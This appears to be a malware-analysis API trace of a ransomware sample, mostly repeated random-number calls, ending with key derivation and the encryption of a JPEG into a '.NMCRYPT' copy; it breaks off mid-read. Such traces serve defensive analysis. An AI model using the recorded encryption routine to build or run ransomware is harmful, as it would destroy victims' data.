CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.331] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0166.332] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0166.332] CryptCreateHash (in: hProv=0x8e3660, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447ac | out: phHash=0x1d4447ac) returned 1 [0166.332] CryptHashData (hHash=0x9ad438, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.332] CryptDeriveKey (in: hProv=0x8e3660, Algid=0x6610, hBaseData=0x9ad438, dwFlags=0x4, phKey=0x1d4447b0 | out: phKey=0x1d4447b0*=0x9ad778) returned 1 [0166.332] CryptSetKeyParam (hKey=0x9ad778, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0166.332] CryptSetKeyParam (hKey=0x9ad778, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0166.332] wcslen (_String="\\\\?\\") returned 0x4 [0166.332] CryptDuplicateKey (in: hKey=0x9ad778, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad578) returned 1 [0166.332] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Tanspecks.jpg.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\tanspecks.jpg.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0166.333] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Tanspecks.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\tanspecks.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0166.333] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=3650) returned 1 [0166.335] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.335] GetLastError () returned 0x0 [0166.335] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.336] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, 